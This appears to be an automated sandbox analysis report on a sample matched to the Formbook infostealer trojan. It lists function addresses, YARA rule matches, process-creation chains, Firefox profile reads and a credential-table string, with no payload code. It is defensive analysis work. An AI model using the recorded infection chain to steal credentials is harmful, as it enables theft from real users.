              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22731F9210_2_22731F92
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A9C3210_2_227A9C32
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227EFCF210_2_227EFCF2
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E7D7310_2_227E7D73
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227E1D5A10_2_227E1D5A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22733D4010_2_22733D40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274FDC010_2_2274FDC0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311A35213_2_0311A352
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031203E613_2_031203E6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306E3F013_2_0306E3F0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310027413_2_03100274
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030E02C013_2_030E02C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305010013_2_03050100
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FA11813_2_030FA118
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030E815813_2_030E8158
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031141A213_2_031141A2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031201AA13_2_031201AA
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031181CC13_2_031181CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030F200013_2_030F2000
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0308475013_2_03084750
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306077013_2_03060770
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305C7C013_2_0305C7C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307C6E013_2_0307C6E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306053513_2_03060535
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312059113_2_03120591
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310442013_2_03104420
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311244613_2_03112446
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310E4F613_2_0310E4F6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311AB4013_2_0311AB40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03116BD713_2_03116BD7
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305EA8013_2_0305EA80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307696213_2_03076962
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030629A013_2_030629A0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312A9A613_2_0312A9A6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306284013_2_03062840
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306A84013_2_0306A840
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030468B813_2_030468B8
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0308E8F013_2_0308E8F0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03102F3013_2_03102F30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A2F2813_2_030A2F28
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03080F3013_2_03080F30
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D4F4013_2_030D4F40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030DEFA013_2_030DEFA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03052FC813_2_03052FC8
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306CFE013_2_0306CFE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311EE2613_2_0311EE26
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03060E5913_2_03060E59
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311CE9313_2_0311CE93
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03072E9013_2_03072E90
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311EEDB13_2_0311EEDB
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306AD0013_2_0306AD00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FCD1F13_2_030FCD1F
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03078DBF13_2_03078DBF
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305ADE013_2_0305ADE0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03060C0013_2_03060C00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03100CB513_2_03100CB5
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03050CF213_2_03050CF2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311132D13_2_0311132D
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0304D34C13_2_0304D34C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A739A13_2_030A739A
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030652A013_2_030652A0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307B2C013_2_0307B2C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031012ED13_2_031012ED
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0309516C13_2_0309516C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0304F17213_2_0304F172
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0312B16B13_2_0312B16B
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306B1B013_2_0306B1B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030670C013_2_030670C0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310F0CC13_2_0310F0CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F0E013_2_0311F0E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031170E913_2_031170E9
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F7B013_2_0311F7B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A563013_2_030A5630
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031116CC13_2_031116CC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311757113_2_03117571
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FD5B013_2_030FD5B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_031295C313_2_031295C3
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311F43F13_2_0311F43F
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0305146013_2_03051460
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FB7613_2_0311FB76
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307FB8013_2_0307FB80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0309DBF913_2_0309DBF9
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D5BF013_2_030D5BF0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03117A4613_2_03117A46
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FA4913_2_0311FA49
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D3A6C13_2_030D3A6C
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030FDAAC13_2_030FDAAC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030A5AA013_2_030A5AA0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03101AA313_2_03101AA3
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0310DAC613_2_0310DAC6
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030F591013_2_030F5910
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0306995013_2_03069950
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307B95013_2_0307B950
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030CD80013_2_030CD800
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030638E013_2_030638E0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FF0913_2_0311FF09
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03061F9213_2_03061F92
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FFB113_2_0311FFB1
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03069EB013_2_03069EB0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03063D4013_2_03063D40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03111D5A13_2_03111D5A
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_03117D7313_2_03117D73
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0307FDC013_2_0307FDC0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_030D9C3213_2_030D9C32
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0311FCF213_2_0311FCF2
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00681D1013_2_00681D10
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CC6013_2_0067CC60
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CC5813_2_0067CC58
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067CE8013_2_0067CE80
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0067AF0013_2_0067AF00
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006853D013_2_006853D0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006835AC13_2_006835AC
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_006835B013_2_006835B0
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_0069BA4013_2_0069BA40
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE34513_2_00CEE345
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE46313_2_00CEE463
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CED86813_2_00CED868
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CEE80713_2_00CEE807
              Source: C:\Windows\SysWOW64\takeown.exeCode function: 13_2_00CECB0813_2_00CECB08
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030DF290 appears 105 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 03095130 appears 58 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030A7E54 appears 111 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 030CEA12 appears 86 times
              Source: C:\Windows\SysWOW64\takeown.exeCode function: String function: 0304B970 appears 277 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02AA89D0 appears 45 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02AA894C appears 56 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A946D4 appears 244 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A94500 appears 33 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A94860 appears 949 times
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: String function: 02A944DC appears 74 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 22777E54 appears 111 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 22765130 appears 58 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2279EA12 appears 82 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 227AF290 appears 103 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 2271B970 appears 277 times
              Source: z10982283782.exeBinary or memory string: OriginalFilename vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1351975173.00000000028F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236423933.0000000002900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1236423933.00000000028FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000003.1235919667.000000007FB0F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1351975173.00000000028F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exe, 00000000.00000002.1416330856.000000007FA2F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs z10982283782.exe
              Source: z10982283782.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 10.2.colorcpl.exe.65f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 10.2.colorcpl.exe.65f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1523878243.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000E.00000002.2494174819.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1523941389.00000000065F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2488106328.0000000000670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2491687518.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000D.00000002.2491841213.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000C.00000002.2492246864.0000000005060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000000A.00000002.1539377405.0000000025240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@11/8
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02A97FD2 GetDiskFreeSpaceA,0_2_02A97FD2
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AAAD98 CreateToolhelp32Snapshot,0_2_02AAAD98
              Source: C:\Users\user\Desktop\z10982283782.exeCode function: 0_2_02AA6DC8 CoCreateInstance,0_2_02AA6DC8
              Source: C:\Windows\SysWOW64\takeown.exeFile created: C:\Users\user~1\AppData\Local\Temp\dGg-0-kLJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: takeown.exe, 0000000D.00000002.2488818800.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000003.1713491005.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2488818800.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000D.00000002.2488818800.00000000009D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: z10982283782.exeReversingLabs: Detection: 52%
              Source: z10982283782.exeVirustotal: Detection: 54%
              Source: C:\Users\user\Desktop\z10982283782.exeFile read: C:\Users\user\Desktop\z10982283782.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\z10982283782.exe "C:\Users\user\Desktop\z10982283782.exe"
              Source: C:\Users\user\Desktop\z10982283782.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
              Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\z10982283782.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Program Files (x86)\MHJugyuzUaheNGpkBeFBNlDyEOcFcyRVbempThHnCRYANZZY\ObMmiCfBgqmt.exeProcess created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\takeown.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: url.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\z10982283782.exeSection loaded: amsi.dllJump to behavior
